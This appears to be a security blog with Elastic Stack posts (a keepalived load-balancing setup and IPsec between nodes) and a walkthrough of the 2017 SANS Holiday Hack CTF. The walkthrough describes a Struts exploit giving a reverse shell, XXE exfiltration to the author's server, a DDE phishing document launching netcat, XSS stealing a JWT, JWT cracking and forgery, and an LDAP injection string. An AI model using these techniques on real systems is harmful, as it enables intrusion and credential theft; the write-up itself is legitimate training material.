Sunday, November 4, 2018

Highly-Available and Load-Balanced Logstash

The Challenge

When using the Elastic Stack, I've found that Elasticsearch and Beats are great at load-balancing, but Logstash... not so much as they do not support clustering. The issues arise when you have end devices that do not support installing Beats agents which send to two or more Logstash servers. To get around this, you would typically:

  • Set up any one of the Logstash servers as the syslog/event destination
    • Pro: Only one copy of the data to maintain
    • Con: What if that server or Logstash input goes down?
  • Set up multiple Logstash servers as the syslog/event destinations
    • Pro: More likely to receive the logs during a Logstash server or input outage
    • Con: Duplicate copies of the logs to deal with
A third option that I've developed and laid out below contains all of the pros and none of the cons of the above options to provide a highly-available and load-balanced Logstash implementation. This solution is highly scalable as well. Let's get started.

Prerequisites

To begin creating this proof-of-concept solution, I began with a very minimal configuration:
  • Two virtual machines within same layer 2 domain (inside VMware Fusion)
    • CentOS 7 64-bit
    • Logstash 6.4.2
    • Java
    • Keepalived
    • IP Virtual Server (ipvsadm)
  • Host machine to generate some traffic (which will generate sample logs)
    • Mac OSX
    • nc

Log Server Configuration

OS install


For this, I simply created a small VMware Fusion virtual machine using the CentOS 7 Minimal ISO as my installation source (this one in particular). The rest of the machine creation is pretty straight-forward. (Note: I did change from NAT to Wi-Fi networking as I was having very strange issues with NAT networking)




After starting the virtual machine, the install process will begin. This is where you can just do a basic install, but I chose a few options that hit close to home with my day job:
  • Partition disk manually if intending to use a security policy (this would otherwise cause a security policy violation that will keep us from proceeding)

  • Configure static addressing (my Wi-Fi network within Fusion is 192.168.1.0/24 with a 192.168.1.1 gateway)
  • Apply the DISA STIG for CentOS Linux 7 because... security.
  • Don't forget to set the root password and create an administrative user. Without this, you'll have a hard time logging in (especially via SSH... given this security policy)


Application Install


From here, let the machine reboot and SSH in (it's a much better experience than using the console via Fusion, in my opinion). Some packages can now be added.
  • First, the Logstash and Load Balancing pre-requisite applications:
    • sudo yum -y install java tcpdump ipvsadm keepalived
  • Next, install Logstash per Elastic's best practices:
    • sudo rpm --import https://artifacts.elastic.co/GPG-KEY-elasticsearch
    • sudo vi /etc/yum.repos.d/logstash.repo

      [logstash-6.x]
      name=Elastic repository for 6.x packages
      baseurl=https://artifacts.elastic.co/packages/6.x/yum
      gpgcheck=1
      gpgkey=https://artifacts.elastic.co/GPG-KEY-elasticsearch
      enabled=1
      autorefresh=1
      type=rpm-md
    • sudo yum -y install logstash

    Logstash configuration


    There would be no way to show off all of the possible Logstash configurations (that's some research for you :) ), so I'll just set up a simple one for testing our highly-available Logstash cluster:
    • This is a bit different, but the API will need to be exposed outside the localhost:
      • sudo vi /etc/logstash/logstash.yml
        • Uncomment http.host and set to the server's IP address
        • Uncomment http.port and set to JUST 9600
    • The input and output configuration for Logstash is next (you can change the filename to something else... unless you agree). For this testing, I'm just setting up a raw UDP listener on port 5514 and writing to a file in /tmp.
      • sudo vi /etc/logstash/conf.d/ryanisawesome.conf
        input {
          udp {
            host => "192.168.1.210" # server's IP
            port => 5514
            id => "udp-5514"
          }
        }

        output {
          file {
            path => "/tmp/itworked.txt"
            codec => json_lines
          }
        }

    SELinux Tweaks


    There's a few settings that need changed to allow keepalived and ipvsadm to work properly.
    • Set the nis_enabled SELinux boolean to allow keepalived to call scripts which will access the network
      • sudo setsebool -P nis_enabled=1
    • Allow IP forwarding and binding to a nonlocal IP address
      • sudo vi /etc/sysctl.conf
        net.ipv4.ip_forward = 1
        net.ipv4.ip_nonlocal_bind = 1
        • If you chose the DISA STIG Policy during the VM build, comment out "net.ipv4.ip_forward = 0" (yes... this is a finding if this system is not a router. But once ipvsadm is running it IS a router. So we're all good ;) )
      • sudo sysctl -p

    Keepalived


    Here's where the real bread-and-butter of this setup lies: keepalived. This application is typically used to provide a virtual IP between two or more servers. If the primary server were to go down, the second (slave) would pick up the IP to avoid any substantial downtime. This is not a bad solution in regards to high-availability, but that means only one server will be online at a given time to process our logs. We can do better. 

    Another feature of keepalived is virtual_servers. With this, you can configure a listening port for our virtual IP and, when data is received, will forward to a pool of servers via a load-balancing method of your choosing. The configuration would look something like this:
    • sudo vi /etc/keepalived/keepalived.conf
      # Global Configuration
      global_defs {
        notification_email {
          notification@domain.org
        }
        notification_email_from keepalived@domain.org
        smtp_server localhost
        smtp_connect_timeout 30
        router_id LVS_MASTER
      }

      # describe virtual service ip
      vrrp_instance VI_1 {
        # initial state
        state MASTER
        interface ens33
        # arbitary unique number 0..255
        # used to differentiate multiple instances of vrrpd
        virtual_router_id 1
        # for electing MASTER, highest priority wins.
        # to be MASTER, make 50 more than other machines.
        priority 100
        authentication {
          auth_type PASS
          auth_pass secret42
        }
        virtual_ipaddress {
          192.168.1.230/24
        }
      }

      # describe virtual Logstash server
      virtual_server 192.168.1.230 5514 {
        delay_loop 5
        lb_algo rr
        lb_kind NAT
        ops
        protocol UDP

        real_server 192.168.1.210 5514 {
          MISC_CHECK {
            misc_path "/bin/python /etc/keepalived/inputstatus.py 192.168.1.210 udp-5514"
          }
        }
        real_server 192.168.1.220 5514 {
          MISC_CHECK {
            misc_path "/bin/python /etc/keepalived/inputstatus.py 192.168.1.220 udp-5514"
          }
        }
      }

    Logstash Health Checks


    You'll probably notice a reference to inputstatus.py in the above configuration. Keepalived will need to run an external script to determine whether or not the configured "real server" is eligible to receive the data. This is typically pretty easy to do with TCP... if a SYN, SYN/ACK, ACK is successful, we can assume the service is listening. This is not an option with a Logstash UDP input as nothing is sent back to confirm that the service is listening. What can be used instead is the API. The following script simply makes an API call to list the node's stats, parse the resulting list of inputs, and, if the input we're looking for is up, exit normally.


    • sudo vi /etc/keepalived/inputstats.py#!/bin/python
      import sys
      import urllib2
      import json

      if len(sys.argv) != 3:
          print "This script needs 3 arguments!: inputstatus.py IP input-id"
          exit(1)

      res = urllib2.urlopen('http://' + sys.argv[1] + ':9600/_node/stats').read()
      inputs = json.loads(res)['pipelines']['main']['plugins']['inputs']

      match = False

      for input in inputs:
          if sys.argv[2] == input['id']:
              match = True

      if match == True:
          exit(0)
      else:
          exit(1)
    Keepalived will add this server to the list of real servers if the exit code of our script is 0 and remove it from the list if it is anything except 0. The aforementioned keepalived configuration is set up to check this script every 5 seconds for minimal log loss if one goes down. Adjust as you see fit here (i.e., how much loss can you acceptably handle).

    Of course, you would have to create several of these if you have Logstash listening on multiple ports, but cut and paste is easy. Just look at /var/log/messages to ensure that these scripts are exiting properly. If you see a line like "Oct 30 09:44:58 stash1 Keepalived_healthcheckers[16141]: pid 16925 exited with status 1", either the script failed or a particular input is not up. Since this error message isn't the most descriptive, you'll have to manually test or view each input on each host to see which one it is. You can manually test the Logstash inputs (once that service is running) by issuing:

    • /bin/python /etc/keepalived/inputstatus.py <IP> <input-id>

    Firewall Rules


    Sure, we could just disable firewalld... but we did just expose our API to anything that can reach this machine, so we need to lock this down a bit better. Don't worry, the rules are pretty straight-forward. (Note: replace '192.168.1.111' with your host which is sending logs to Logstash and '192.168.1.210', '192.168.1.220', and '192.168.1.230' with the two Logstash servers and virtual IP address, in that order).
    • sudo firewall-cmd --permanent --add-rich-rule='rule family=ipv4 source address=192.168.1.210/32 protocol value=vrrp accept' 
    • sudo firewall-cmd --permanent --add-rich-rule='rule family=ipv4 source address=192.168.1.220/32 protocol value=vrrp accept'
    • sudo firewall-cmd --permanent --add-rich-rule='rule family=ipv4 source address=192.168.1.210/32 destination address=192.168.1.220/32 port port=9600 protocol=tcp accept'
    • sudo firewall-cmd --permanent --add-rich-rule='rule family=ipv4 source address=192.168.1.220/32 destination address=192.168.1.210/32 port port=9600 protocol=tcp accept'
    • sudo firewall-cmd --permanent --add-rich-rule='rule family=ipv4 source address=192.168.1.111/32 destination address=192.168.1.230/32 port port=5514 protocol=udp accept'
    • sudo firewall-cmd --permanent --add-rich-rule='rule family=ipv4 source address=192.168.1.111/32 destination address=192.168.1.210/32 port port=5514 protocol=udp accept'
    • sudo firewall-cmd --permanent --add-rich-rule='rule family=ipv4 source address=192.168.1.111/32 destination address=192.168.1.220/32 port port=5514 protocol=udp accept'
    • sudo firewall-cmd --reload

    The Second Logstash server


    Shut down the Logstash server virtual machine since it's much easier to just clone this one and make a few configuration changes instead of stepping through this process all over again.

    Now that it's shut down...


    Boot the second one up (leaving the first powered off for now) and make the following changes in the VM console:
    • Set hostname
      • sudo hostnamectl set-hostname stash2
    • Set IP address
      • sudo vi /etc/sysconfig/network-scripts/ifcfg-<interface>
        • Change IPADDR to appropriate IP address
      • sudo systemctl restart network
    • Change Logstash listening IPs
      • sudo vi /etc/logstash/logstash.yml
        • Change http.host to stash2's IP address
      • sudo vi /etc/logstash/conf.d/ryanisawesome.conf
        • Change host to stash2's IP address
    • Swap the unicast_src_ip and unicast_peer IP addresses 
      • sudo vi etc/keepalived/keepalived.conf
    • Reboot
      • sudo reboot now
    Now, you should be able to start the original virtual machine (in my case, Stash1)

    Putting It All Together


    We've finally reached the point to fire up all the services and test out the HA Logstash configuration. On each Logstash VM:

    • sudo systemctl enable logstash
    • sudo systemctl start logstash
    • sudo systemctl enable keepalived
    • sudo systemctl start keepalived
    You can monitor that Logstash is up by viewing the output of:
    • sudo ss -nltp | grep 9600
    If you have no output, it's not up yet. If it doesn't come up after a few minutes, check out /var/log/logstash/logstash-plain.log to any error messages. Personally, I like to "tail -f" this file right after start logstash to ensure everything is working properly (plus it looks cool to those that look over your shoulder as all that nerdy text flies by).

    On each machine, you can now check that ipvsadm and keepalived are configured properly and playing nice together. You should be able to run the following command and get similar output (you IPs may be different, but you should see TWO real servers):
    • ip a
      • Only ONE of the two servers should have the virtual IP assigned (by default, the one with the higher IP address since the priority is the same and this is the tie-breaker when using VRRP)
    • sudo ipvsadm -ln
      IP Virtual Server version 1.2.1 (size=4096)
      Prot LocalAddress:Port Scheduler Flags
        -> RemoteAddress:Port           Forward Weight ActiveConn InActConn
      UDP  192.168.1.230:5514 rr ops
        -> 192.168.1.210:5514           Masq    1      0          0       
        -> 192.168.1.220:5514           Masq    1      0          0 
    To test that load balancing is happening, the sample log source (in my case, my host operating system) will need to send some data over UDP 5514 to the virtual IP address. To do this, I'm going to use netcat (but really anything that can send data manually over UDP will work... including PowerShell). 
    • for i in $(seq 1 4); do echo "testing..." | nc -u -w 1 192.168.1.230; done
    What I just did was send four test messages to the virtual IP. If everything worked properly, the virtual server will have received the messages and load-balanced, in a round-robin fashion, to each server's /tmp/itworked.txt file. On each server, let's check it out.
    • cat /tmp/itworked.txt
      {"host":"192.168.1.111","@timestamp":"2018-11-04T17:34:37.065Z","message":"testing...\n","@version":"1"}
      {"host":"192.168.1.111","@timestamp":"2018-11-04T17:34:39.038Z","message":"testing...\n","@version":"1"}
    Success! Both servers received two messages!

    Thursday, August 9, 2018

    Ryan's CTF Has Come to an End...

    Thanks everyone!

    My Google Cloud Platform trial is very low on funds, so it's time to end the CTF. I hope everyone had a great time. Here are the results:

    372 teams!


    Only 17% got the NINJA challenge... All but 8 were solved AFTER John Hammond's video walkthrough.

    3142 flag submissions!

    First 10 with a perfect score of 1000!

    True CTF NINJAs with perfect scores!




    To all that played and provided feedback, THANK YOU! There will be more of this to come!


    Monday, July 16, 2018

    Free CTF is Online!

    While my free Google Cloud Platform account is still active (until ~30 Nov 2018), feel free to try out my Capture the Flag at http://ctf.ryanic.com! Have fun red teamers! Ground rules: please try not to hack the platform itself. That ruins the fun for others.

    Monday, April 2, 2018

    Resolving REST over HTTP Man-in-the-Middle with IPSEC

    So... what's the problem?

    I am currently working with some Elastic Stack clustering when I quickly realized that, if two or more nodes traverse a security boundary, they may be subject to tampering if an evil man (or woman) in the middle were to intercept and modify the data sent between them. Yes, there is a solution from Elastic, called X-Pack Security, that can provide SSL between the nodes, but that's one of the rare things that Elastic charges for. The reason I was even pondering the use of Elastic was to replace a certain, well-known data aggregation solution that is eating up quite a bit of budget (and even more memory)

    Below shows the traffic between two nodes (10.1.2.230 and 10.1.2.231). This data sent over TCP port 9300 is used for Elasticsearch cluster communication as is simply REST over HTTP. What could possibly go wrong? This communication could be things such as node to node conversations, replication of data, or other important cluster information. If this data were to be captured, attackers could get some valuable intelligence regarding the systems supported by this log aggregation service. Worse yet, if this communication were to be poisoned via a man-in-the-middle attack, the entire log aggregation service could be deemed useless.



    What as the solution?

    After a ton of Googling, I stumbled upon a solution that has been very well known in the Red Hat community for some time now that, honestly, I should have been aware of - LibreSwan. LibreSwan is a free, open-source package that allows for host-to-host, host-to-network, and network-to-network IPSEC tunneling. This would be perfect! After some trial and error, I decided to use the Pre-Shared Key implementation to test it out. Here's the very simple setup and configuration of LibreSwan:

    1) Install Libreswan on each node:

    # yum -y install libreswan

    2) Configure a tunnel (in this case, it is named mytunnel and the config file is located at /etc/ipsec.d/my_host-to-host.conf):

    # vi /etc/ipsec.d/my_host-to-host.conf

    conn mytunnel
            left=10.1.2.230
            right=10.1.2.231
            authby=secret
            auto=start

    3) Create a random, base64 key of 48 total bytes (only need to do this on one machine as the keys MUST match on both sides. Doing this twice should not yield the same key):

    # openssl rand -base64 48
    n8+ef4PA4VAtqd1iX7QzC3sLmxlLi30LzOTgg7JBmNXQ7Wsi8SnweO+hjlXNK/rE

    4) Create a "secrets" file with the above command output as the pre-shared key (Note: this is one, continuous line):

    # vi /etc/ipsec.d/es.secrets
    10.1.2.230 10.1.2.231 : PSK "n8+ef4PA4VAtqd1iX7QzC3sLmxlLi30LzOTgg7JBmNXQ7Wsi8SnweO+hjlXNK/rE"

    5) Enable and start the Libreswan service:

    # systemctl enable ipsec
    # systemctl start ipsec

    As you can see below, the Wireshark output is now showing ESP communication between the two endpoints! As long as that pre-shared key is kept secret, we're good (although it may be a good idea to rotate this key occasionally so offline brute force attacks would be less successful).



    What's next?

    I should probably move away from the pre-shared key implementation and onto getting this to work with public/private key so I don't need to worry about secure transmission of the pre-shared key in production. Other than that, this solution seems pretty solid as I've been sending quite a bit of data at my Elastic Stack implementation and it's replicating across the cluster rather seamlessly!

    Thursday, January 11, 2018

    2017 SANS Holiday Hack Challenge Walkthrough

    Introduction

    This article actually started life as my notes for the 2017 SANS Holiday Hack Challenge and I thought, this would make a great blog post over at ryanic.com for anyone who may be struggling with any of the challenges. Now, with that said, there are SPOILERS EVERYWHERE so proceed with caution if you just wants nudges here and there as this article shows, in grave detail with screenshots'o'plenty how to complete each and every challenge (to include the terminal challenges). With that, let's get started!

    The Setup

    Throughout the course of this challenge, I realized that a simple web browser on a laptop may not be enough since many of the challenges nearly require reverse shells and some exploit code. The biggest hint is when I viewed some of the SANS Pentest blogs and, in particular, this one describing the benefits of Amazon EC2 instances for penetration tests.

    With that, I ended up with the following:
    • Host machine (Mid-2015 Macbook Pro -- arguably Apple's best laptop to date)
    • VMware Fusion with the following virtual machines:
      • Kali Rolling 2017.1 Linux
      • Windows 10
        • Microsoft Office 2016
        • Netcat (directory added to %PATH%)
    • Google Cloud Platform Compute Engine (bitnami-launchpad-lampstack)
      • One year, free $300 credit
      • Added an inbound firewall rule to allow 4444/TCP (80/TCP and 443/TCP are enabled by default when deploying a web VM)

    The Nine Challenges

    1) Visit the North Pole and Beyond at the Winter Wonder Landing Level to collect the first page of The Great Book using a giant snowball. What is the title of that page?

    This challenge actually took a bit as only having the snowball tool did not make getting the page an easy task. It wasn't until I had the conveyor by beating a terminal challenge (see those in all their glory after the nine challenges section) that I was able to retrieve the page. I'm not going to show what I placed where as you, the reader, should experience all the pain that I did when trying to guide the giant snowballs to their ultimate destinations. I will, however, show off by posting screenshots of the objectives that I met:

    To answer the question, the title of this first page is About This Book...

    2) Investigate the Letters to Santa application at https://l2s.northpolechristmastown.com. What is the topic of The Great Book page available in the web root of the server? What is Alabaster Snowball's password?

    This was a multi-step process involving lots of research and understanding of a relatively new vulnerability that affected most of us in the United States -- Apache Struts. The first place I went (and most people go) when pen-testing a web application is "View Source". It looked pretty vanilla until one link seemed a little out of place...
    Following that link led me to a development version of the web site. Upon viewing the source of the dev page, I found a nice hint as to what to do next:
    This information, along with the hints received from Sparkle Redberry (great elf names, by the way) led me to this exploit: https://www.exploit-db.com/exploits/42627/. If vulnerable, the only thing left to find is a proper URL. Through some trial-and-error and creating some entries on the dev site, I found one: http://dev.northpolechristmastown.com/orders/1234 (could really be any number here).

    To allow for a remote shell to return to me, I fired up a Google Cloud VM, set up a firewall rule to allow port 4444/tcp, and tried to receive a shell from the web server:

    Now that I'm in, it's time to find that Great Book Page. The web root directory in many Linux installations is /var/www/html, so that's the first place I'll check:
    There it is, so I'll use the same exploit that sent me the shell to send me the file (this time to my own web directory so I can retrieve it easily) NOTE: Google changed my IP from what it was before and this happens several times throughout:

    The topic of the page is Flying Animals.

    Now, it's time to find Alabaster's password. I'll solve this by simply doing a recursive search for "alabaster" to see which files may list his username and password in plain text:
    After looking into that file, I found Alabaster's password, stream_unhappy_buy_loss:

    3) The North Pole engineering team uses a Windows SMB server for sharing documentation and correspondence. Using your access to the Letters to Santa server, identify and enumerate the SMB file-sharing server. What is the file server share name?

    This will be the first time I use the public-facing Letters to Santa (l2s) server to pivot internally. There's many ways to pull this off, but the easiest is to simply establish local port forwarding from my Kali machine's port 445, through the l2s server via SSH, and then to the ultimate destination's port 445. First, though, I need to find the Server Message Block (SMB) server. To do this, I SSH to alabaster's machine using the password found in the last challenge (and, therefore, verifying that it is correct). Once connected, I find out quickly that commands are limited (it's an rbash session), but nmap is available:
    Using one of Holly Evergreen's hints, I discover that not all of North Pole Christmas Town's machines respond to pings, so nmap may falsely report that they are down. To combat this, I'm going to use the following command to discover which machines are serving SMB:
    So, I have two choices... the EMI host and the one named smb-server. I think it's safe to assume that the one to go after is hhc17-smb-server (10.142.0.7). I'm going to set up local port forwarding and see which shares are available (it was also noted by Holly that Alabaster likes to reuse credentials, so I'll try to connect to the SMB server as him):
    The "FileStor" share looks interesting, so let's check that one out:
    Bingo! There's the third page! I'll grab all of the other files as well as they may be useful later:
    Now we possess the third page (The Great Schism) but, to answer the question, the share name is FileStor:


    4) Elf Web Access (EWA) is the preferred mailer for North Pole elves, available internally at http://mail.northpolechristmastown.com. What can you learn from The Great Book page found in an e-mail on that server?

    For access to the internal systems with web frontends (EWA, EAAS, EDB), I have to, yet again, use the l2s server as a pivot -- this time as a Socket Secure (SOCKS) proxy listening on local port 8000:
    I'm also adding BURP Suite into the mix to intercept any connections that I may want to modify by having it listen on port 8080 and then send the data to the SOCKS proxy:

    And, finally, I'm setting up Firefox to send HTTP to BURP:
     
    Now, I can finally browse to the mail server... as soon as I figure out its IP. Luckily, l2s has a hosts file that tells me everything I need (otherwise, I'd resort to nmap to find a host with open mail ports):
    After browsing to http://10.142.0.5, I see a login page. I remember Pepper Minstix telling me about potential dev files and that Alabaster "was working on keeping the dev files from search engine indexers". To me, this means that there's probably a robots.txt file that may point me to any directories or files that the web admin may want to prevent the crawling of:
    And there it is: cookie.txt. Let's see what this tells us:
    To get a sense of the code, I will install node, npm, and the aes-256 and randomstring modules on Kali and walk through the code. Eventually, I start playing with ciphertexts of varying lengths and differing keys to see if I could get anything strange to happen (as there are hints pointing towards encrypted text of 16 bytes causing something strange) and in fact I do notice something odd:
    It appears that no matter which key is used, when I pass a string of 22 characters as the ciphertext, it returns a blank string as the plaintext. This makes sense as there is the warning of 16 bytes and reference to base64 in the code. With that knowledge and knowing that for every 6 bits of input, there are 8 bits are output when converting to base64, I'm going to do a little math. Sixteen bytes equals 128 binary bits, which equal 170.66667 bits when converted to base64 (this would actually be padded out to 176 bits to stay a multiple of 8 bits so it can be presented properly. This is where you would see = or == at the end of a base64 string), which, finally, equals 22 bytes. I can definitely use this to my advantage as we'll see shortly. 

    I'll return to the login page and review the source. Here's where I notice a few more things:
    • There's a custom.js page to investigate
    • On the custom.js page, it looks like the login request is forwarded to account.html for verification:
    Next, I'm going to use BURP to see what's being sent when visiting the page:
    Nice! Looks like a JSON-style Cookie with fields we can manipulate using the things we learned earlier: the blank plaintext, the 22-character ciphertext, and... a name. What would a valid name be? Time to brute force the login page to see if we get any login errors (or lack there-of). After trying alabaster_snowball (like the SSH login) I get an error message of "User Does Not Exist. Ex - first.last@northpolechristmastown.com". Well that was easy. I'll just put alabaster.snowball@northpolechristmastown.com as the name. This is where an awesome Firefox add-on comes in, Cookie Manager+:
    The cookie is now forged and I can now attempt to access http://10.142.0.5/account.html:
    And... I'm in! Now to sift through the Inbox for the Great Book page:
    The email with the subject "Lost book page" tells us to look at /attachments/GreatBookPage4_893jt91md2.pdf:
    This page tells us that there is an ongoing war between Munchkins and Elves!

    5) How many infractions are required to be marked as naughty on Santa's Naughty and Nice List? What are the names of at least six insider threat moles? Who is throwing the snowballs from the top of the North Pole Mountain and what is your proof?

    The wording to this challenge was a bit tricky as I was considering how many "coals" it took to be recognized as "naughty" instead of, literally, how many times the person showed up in the NPPD database. After that was clear, this was as simple as merging a couple Excel files and creating a pivot table.

    As shown in the third challenge, I obtained the Naughty and Nice list in both Word and Excel formats from the SMB server. To be able to carve through the data more easily, I'm choosing to use the Excel version. The next step is to get a copy of the infractions. This isn't readily apparent as the NPPR infractions page doesn't show a download link unless you first do a filter on the data. To get all the data, it does support selecting a field name (status in my example) equal to a wildcard to "filter" the data and show the Download link as shown below with status:*.
    ...

    The downloaded file contained raw JSON, so I found this neat site to convert this data to Comma-Separated Values (CSV). I simply uploaded my JSON file and it spit out a .csv file.

    Once opening this file, I will immediately copy/paste the naughty-nice.csv data into a second sheet called "Naughty and Nice List". Now, I'm going back to the original sheet and creating an additional column called naughty-nice and using the VLOOKUP command to add data if the person in the infractions_name column is considered naughty or nice:
    This formula will now be pasted down the 998 other rows (this will make sense shortly...). Next, I am creating a Pivot Table to "unique" each name, show how many occurrences there are of the name (infractions), and a filter to show those who are considered naughty or nice:
    When sorting the data that was output by "Count of infractions_name" and toggling between naughty and nice, it appears that any name occurring 4 or more times is considered naughty (shown sorted lowest to highest in the screenshot below) and those 3 or less times is considered nice (shown sorted highest to lowest in the screenshot below):



    So with that... 4 is the number of infractions required to be considered naughty by Santa.

    In regards to the insider threat moles, another hint came from one of the files from the SMB server (BOLO - Munchkin Mole Report.docx):

    This one is rather easy as I am just going to look for any people with occurrences of  "Throwing Rocks (at people)" and/or "Aggravated pulling of hair" infractions. With this, I find that the following are Munchkin Moles (there are plenty more):
    So... six more moles to name are Beverly Khalil, Kirsty Evans, Nina Fitzgerald, Manuel Graham, Sheri Lewis, and Adrian Kemp.

    Finally, after getting to the exits of all of the games, I receive the following "Conversation with Bumble and Sam" in my Stocking:

    So, as you can see, the Abominable Snow Monster was the one throwing the snowballs!

    6) The North Pole engineering team has introduced an Elf as a Service (EaaS) platform to optimize resource allocation for mission-critical Christmas engineering projects at http://eaas.northpolechristmastown.com. Visit the system and retrieve instructions for accessing The Great Book page from C:\greatbook.txt. Then retrieve The Great Book PDF file by following those directions. What is the title of The Great Book page?

    As shown in the earlier screenshot of /etc/hosts, the EaaS server is located at http://10.142.0.13. Upon browsing to that server, there are two interesting links -- "click here" under Elf Checking System 2.0 and "here!" under Elf Reset. First, I'll try "click here" which takes me to http://10.142.0.13/Home/DisplayXML:

    Here, I'm presented with a couple of hints on how to proceed: 
    • I have an ability to upload a file
    • The file it wants may be an XML (given the URI). 
    This leads me to have a look at this SANS Pentest blog. XML External Entity (XXE) manipulation seems like a viable option, so I'll create these two files:
    • The XML file to upload (test.xml)
      • This tells the server grab more code from the test.dtd file that my web server (35.192.43.130 this time) is hosting
      • After retrieving instructions, do whatever sendit says to do (from the .dtd file)
    • The DTD file to live on my web server (test.dtd)
      • Set the stolendata variable to C:\greatbook.txt
      • Send a GET request to my web server on port 4444
    Before I can upload the file, I'm starting a netcat listener on my web server. Now to upload the file and wait to see if I get the contents of greatbook.txt:
    Hey! A link! Let's go there:
    The title of this page is The Dreaded Inter-Dimensional Tornadoes.

    7) Like any other complex SCADA systems, the North Pole uses Elf-Machine Interfaces (EMI) to monitor and control critical infrastructure assets. These systems serve many uses, including email access and web browsing. Gain access to the EMI server through the use of a phishing attack with your access to the EWA server. Retrieve The Great Book page from C:\GreatBookPage7.pdf. What does The Great Book page describe?

    I have to use a Windows machine with Office to exploit this one as there are plenty of hints stating that Alabaster likes to check his email from the EMI machine... which also has Office installed. I attempted pulling off this exploit with Office for Mac, but just wouldn't work. Anyways, now that I have access to the email server, I can send Alabaster phishing emails. The sky's the limit with phishing, but there is a great hint from Shinny Upatree regarding Dynamic Data Exchange (DDE), so that's what I'll try. I am using this article as a guide. Why I believe this will work is this email stating that Alabaster doesn't have the greatest security practices when it comes to email (or many other things as we've already seen):
    My code looked a bit different than what was in the link and, to be honest, I had several payloads that I attempted. I tried to have Alabaster pull down powercat.ps1 and execute it (the download portion would work, but the execute portion always seemed to fail). I will settle on running netcat since this email hints that it may be installed (and its directory in his %PATH%):
    Here's the final code embedded in a docx which simply launches a netcat connection to l2s:

    I will log in as Shinny Upatree using the same cookie modification as earlier when I logged in as Alabaster to send my phishing email to Alabaster (he may not click on an email from himself). Here's my message (with the .docx attached):
    Just before hitting send, I will start an ncat listener on l2s and will wait for the connection. After a short time, I received the reverse shell and proceeded to send the GreatBookPage7.pdf file to my Google VM, and then to Kali (ignore the typo... this attack was inconsistent and I couldn't get a "clean" screenshot, thus showing that I am, in fact, human):



    This Great Book page describes witches as neutral... that is, until we unseated the villian (who is the one provoking the war -- as you'll see later).

    8) Fetch the letter to Santa from the North Pole Elf Database at http://edb.northpolechristmastown.com. Who wrote the letter?

    Probably the most complex and "out of my comfort zone" challenge of this whole event! I used Wunorse Openslae's hints pretty heavily and, more importantly, learned a TON in the process.

    I, again, will utilize the SOCKS proxy connection to the l2s/dev server to reach this internal asset. After setting up the connection, the first step is to navigate to 10.142.0.6 and  find a way to use the Cross-Site Scripting (XSS) vulnerability that is hinted at. At first glance, the root of http://10.142.0.6/index.html is a simple login page, but there's also a "Support" link, which leads to a form... a great place to try some XSS:

    Before conducting XSS, I first have to decide what I want to get out of it (instead of doing XSS for XSS's sake). Looking at the source code of index.html, it appears that the JSON Web Token (JWT) (that, again, is hinted at by Wunorse) is being stored as LocalStorage with the name "np-auth":
    After a lot of trial and error using the link provided by Wunorse for some XSS evasion, I finally settle on this to send the JWT to my Google Cloud VM (<IMG SRC=/ is preceding "onerror"...):

    After a few minutes, the JWT shows up in my Apache access_log:
    I will now parse the two base64-encoded portions of the JWT (the first part before the first period and the second part between the first and second periods) and get the following information about the login session:
    As you can see, this JWT is expired, so a new date must be inserted. This sounds easy, but then the signature (the part after the third period) would be invalid. This also means that I need to crack the key. This is where jwtcrack comes in handy.

    After downloading jwtcrack, I have to install the tool (on my MacBook since I prefer to use all of the machine's horsepower for cracking things instead of what's limited to a VM):
    Next I am going to run it with the entire JWT as an argument, sit back, and wait for this program to brute-force the secret key:
    How original... the secret key is 3lv3s. Now I must create a JWT with a proper date that I can use. I'll use Wunorse's advice and create a JWT (with a proper date and the same data as the original) with pyjwt (not shown, I installed with sudo pip install pyjwt):
    Looks like it worked! Now... what to do with this? Luckily, Firefox has the ability to run Javascript "on the fly" to inject my own JWT into localStorage. I will do this by going to Developer--> Web Console --> JS tab and entering localStorage.setItem("np-auth","eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJkZXB0IjoiRW5naW5lZXJpbmciLCJvdSI6ImVsZiIsImV4cGlyZXMiOiIyMDE3LTEyLTMxIDEyOjAwOjQ3LjI0ODA5MyswMDowMCIsInVpZCI6ImFsYWJhc3Rlci5zbm93YmFsbCJ9.KcrW5SPdQnMAPDnMWrryRigrM2ZSZsY3TLfrvoZ8Il4");

    When refreshing the page, I am now logged in as Alabaster Snowball!:
    It looks like there's a privileged area for a "Claus" by clicking on the dropdown in the top-right corner and selecting "Santa Panel"... but I get the following error: "You must be a Claus to access this panel!"

    This looks like a good place to store a letter to Santa. Now I need to figure out a way to log in as a "Claus". After reviewing this SANS Pentest blog post regarding LDAP (and this looks like it pulls information from an LDAP or LDAP-like source), I decide to give it a whirl to get the information I would need to forge another JWT -- this time for Santa Claus. Since the search is limited to either elves or reindeer, I would need to manipulate the POST request. I do this by manipulating the search field (since I can modify it "in-browser" and was shown to be the likely candidate according to the SANS blog post). The search term that gives me what I need is ))(dept=it)(|(cn= :
    When running that query, I get ALL of the personnel (not just the elves and reindeer) including Santa Claus!:
    I will now use pyjwt to "re-forge" the cookie -- now with santa.claus as the uid and administrators as the dept:
    Using Web Console's JS capability, I will, again, update "np-auth" with this new JWT and refresh the page. This time, I get a different error when clicking on the Claus Panel:
    Great... now I need to find a way to gather the password. After many (presumably) unsuccessful attempts to get the password to show up in the personnel search table by changing the attributes in the POST request with BURP Suite, I found out (with Wireshark) that the password hashes ARE being sent after all... just not rendered on the page:

    This hash identifies as a lot of potential hash types, but I'll try MD5 first as it's the most common of what's on the list:
    Next I must put the hash in a file and run John the Ripper against it:
    Back at EDB, I enter Santa's password and got the letter to Santa!:

    This letter to Santa was from Emerald City Oz.

    9) Which character is ultimately the villain causing the giant snowball problem. What is the villain's motive?


    After "unseating the villian" in the last game, I discovered that the villian was Glinda, the Good Witch! Her motive was war profiteering.


    Terminal Challenges

    Linux Command Hijacking


    The objective of this challenge is to simply run a binary (elftalkd), so the first thing I did was to look for it with find:

    That's a strange error... and since when is "find" in /usr/local/bin? Something's not right, so I looked at PATH:

    Aha! /usr/local/sbin/ and /usr/local/bin/ are first in PATH, so I removed them and tried to find elftalkd again:

    There it is! Now to run it:
    Success!

    Candy Cane Striper


    This one took a little extra research and I certainly gained a ton of knowledge! The goal of this one is to simply run a Linux binary... that is owned by root and marked as non-executable. 

    After many attempts to copy the binary, change permissions, and privilege escalation (to no avail), I stumbled upon the following web page: https://penturalabs.wordpress.com/2013/08/07/linux-execute-a-non-executable/

    The first task was to check the platform:

